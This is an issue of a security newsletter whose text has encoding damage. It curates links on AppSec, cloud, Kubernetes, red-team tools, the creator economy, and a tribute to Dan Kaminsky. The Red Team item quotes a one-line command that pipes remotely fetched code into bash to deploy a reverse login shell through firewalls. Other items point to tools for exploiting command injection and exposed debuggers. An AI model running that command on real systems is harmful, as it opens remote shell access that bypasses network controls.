Clint Gibler

Head of Security Research @ r2c
šŸ’™ DevSecOps, scaling security, & killing bug classes.

Hey there,

I hope youā€™ve been doing well!

Types of Errors

Sometimes it can be hard to grok the terms people use to describe security tool output.

Thankfully, Vladimir Haltakov shared this helpful graphic šŸ¤£

Type 1 and Type 2 Errors

My immediate next thought was, ā€œOK great, but what about soundness and completeness?ā€ I see @maegfair in fact asked this exact question, and while I like the responses, I think thereā€™s more that can be done.

Random idea: how excited would you be about memes explaining static analysis (or program analysis / automated bug finding in general), or via a comic or something?

Sponsor

šŸ“¢ Scale your security team with Faraday

Attack surface increases day-by-day, reaching the limits of every team's resources without proactive collaboration, automation and cross-company integrations.

What if you could automate daily tasks, like running your favorite scanners and actions based on findings? Normalize and review results from different sources, manage, tag, track vulnerabilities as a team and generate outstanding reports with ease.

Faraday is a Vulnerability Management platform that enables teams to scale. Let us show you how to rethink vulnerability management.

Try Faraday now

šŸ“œ In this newsletter...

  • AppSec: Security program metrics, GitHub Action to find license compliance issues, static analysis for shell scripts, visualize your dependencies and their vulns in a graph DB, requirements for modern security tools
  • Web Security: sqlmap for command injection, attacking remote debuggers
  • Cloud Security: Using last accessed info to tighten IAM permissions, annotating Kubernetes services, do OS's even matter now?
  • Container Security: Kubernetes stress testing tool, a practical guide to writing secure Dockerfiles
  • Red Team: A small reverse shell that works through NAT/firewalls
  • The Creator Economy: Digital value exchange in the future, universal creative income
  • Misc: Ransomware monetizing via shorting stock
  • Remembering Dan Kaminsky: Reflections, stories, and the power of kindness

AppSec

What basic security metrics should a good cybersecurity program keep track of?
Twitter thread by @EdgarR0jas.

fossas/fossa-action
GitHub Action by FOSSA that uses the FOSSA CLI to find license compliance and security issues. Note: requires a FOSSA license key.

koalaman/shellcheck
A static analysis tool for shell scripts by Vidar Holen. Largely focuses on quality/correctness issues, not security, like incorrect quoting or conditionals, frequently misused commands, common beginner mistakes, portability, and more.

How to create a Software Bill of Materials in Neo4J
By Javier Dominguez: how to visualize a projectā€™s libraries and the vulnerabilities in its dependencies. Run OWASP Dependency-Check on a project -> import the result into Neo4J -> run graph queries.

Visualizing an SBOM via Neo4J
Blue node = the project, green = libraries, red = CVEs

Changing Security Tool Requirements in the New DevSecOps World
Twilioā€™s Yash Kosaraju provides a nice overview of how modern security tools should ideally work: results consumable directly by developers, fast (doesnā€™t prohibitively slow down CI/CD), API-first and integration rich, high signal (better to have false negatives than cause engineer fatigue and lack of trust in the tool), and deliver results in developersā€™ workflows and the systems they already use.

And I love this comment by Laksh Raghavan about it:

Aspire to go from ā€œidentification of a specific vulnerabilityā€ to ā€œimplemented as a check in tool(s) + scans of ALL apps completedā€ in a matter of hours, not days. Shorten the time of all feedback loops. Reduce exposure time.

See also Lakshā€™s excellent talk on the dev-friendly continuous scanning platform they built at PayPal.

Web Security

commixproject/commix
By Anastasios Stasinopoulos: Automates the detection and exploitation of command injection vulnerabilities. like sqlmap but for command injection.

Remote debuggers as an attack vector
Exposed debuggers are a great way to get remote code execution. Acunetixā€™ Aleksei Tiurin lists a number of debuggers for different languages, their default ports, and tips on exploiting them.

Cloud Security

Review last accessed information to identify unused EC2, IAM, and Lambda permissions and tighten access for your IAM roles
ā€œWhen you are working on new permissions for your team, you can use IAM Access Analyzer policy generation to create a policy based on your access activity and set fine-grained permissions. To analyze and refine existing permissions, you can use last accessed information to identify unused actions in your IAM policies and reduce access.ā€

Annotating Kubernetes Services for Humans
Thereā€™s a variety of meta info thatā€™s generally useful to know about a code repo, like: who owns it? What Slack channel does the team use? Where should I file a bug? Iā€™ve seen a number of companies require every repo to have a YAML file with certain metadata, and its invariably quite useful to both the security and engineering teams.

In this post, Richard Li recommends doing a similar thing, but for microservices, using Kubernetes annotations.

Nobody Cares About the Operating System Anymore
Last Week in AWSā€™ Corey Quinn argues that originally oneā€™s OS mattered due to support contracts, but cloud offerings have largely abstracted this away, with containers and functions as a service going even further. ā€œThe Distro Wars are now about #Kubernetes implementations.ā€ As always, I love the snark:

Once upon a time when I was a fledgling Linux systems administrator, the distribution you used Really Mattered.

You used Gentoo or similar if you didnā€™t value your time, you used Ubuntu if you valued community, you went with Debian if you enjoyed having the crap kicked out of you in IRC channels and mailing lists, and so on.

Container Security

Introducing kube-burner, A tool to Burn Down Kubernetes and OpenShift
Raul Sevilla Canavate describes kube-burner, a tool aimed at stressing Kubernetes clusters by creating or deleting a high quantity of objects.

A practical guide to writing secure Dockerfiles
The blog version of Madhu Akulaā€™s talk that I called out in tl;dr sec 70, which includes a number of useful tips and other good resources and tools. Great overview.

Red Team

Global Socket | Connect like there is no firewall
By @hackerschoice: Deploy a reverse login shell with a single command, and access the shell remotely, encrypted, through NAT/firewalls and via TOR if you like.

$ bash -c "$(curl -fsSL http://gsocket.io/x)"

The Creator Economy

Thinking About Different Types of Digital Value Exchange
Daniel Miessler posits the following are inevitable: peer-to-peer value exchange, creator economies, and granular investment. Iā€™ve previously thought itā€™d be neat to be able to ā€œinvestā€ in someoneā€™s career who you think is a rising star, who perhaps might come from a disadvantaged background. Some bootcamps do this in a way, by taking a cut of graduateā€™s first year salary.

The Case for Universal Creative Income
By Li Jin and Lila Shroff: ā€œIn 1935, the US enacted various New Deal cultural programs to provide relief for jobless artists and democratize public access to art. A century later, itā€™s time to renew that spirit.ā€ They argue for the value of UCI to the economy (more innovation and creativity), to platforms (entice more creators and thus value to users), and to creators (less stress, enable creators from underprivileged groups to take the leap).

Misc

Ransomware gang wants to short the stock price of their victims
Cyber crime monetization is pretty interesting. Hereā€™s another angle: short the victimā€™s stock before announcement, taking advantage of the dip. Unfortunately for them, this is probably not that effective, as dips are usually small and temporary, and any person taking a large short bet would likely be investigated by the SEC or other regulatory bodies.

Remembering Dan Kaminsky

This week, Marc Rogers announced that Dan Kaminsky had passed away.

I didnā€™t know Dan, but I was fortunate enough to see his DNS talk live at DEF CON. I remember feeling my brain hurting about 10 minutes into the talk as I tried to keep up.

Itā€™s been heartwarming to see glimpses of Dan, whether itā€™s via The Register, The Seattle Times, or The New York Times giving a bit of context about his life, or the personal stories from Ryan Naraine, this HN thread, or this ā€œtell me your best Dan Kaminski storiesā€ Twitter thread by Riana Pfefferkorn.

I also enjoyed this Twitter thread of Danā€™s:

Dan Kaminsky Believes in You

Reading all of these stories about Dan, I find it moving and a bitā€¦ inspiring.

Like ripples from a pebble dropped in a pond, I think about all of the peopleā€™s lives Dan touched, in big and small ways.

Even if you havenā€™t (yet šŸ˜‰) found epic bugs that break the Internet; every day, your actions and words affect people.

We can all be the source of making the Internet a little bit safer, and the lives around us a little bit happier, one supportive smile or kind word at a time.

You can make a lot of ripples in a lifetime.

The closing number of Hamilton comes to mind: Who Lives, Who Dies, Who Tells Your Story:

I try to make sense of your thousands of pages of writings
You really do write like youā€™re running out of time

I ask myself, what would you do if you had more time?

āœ‰ļø Wrapping Up

Have questions, comments, or feedback? Just reply directly, I'd love to hear from you.

If you find this newsletter useful and know other people who would too, I'd really appreciate if you'd forward it to them šŸ™

Thanks for reading!

Cheers,
Clint
@clintgibler

Tags:

Updated: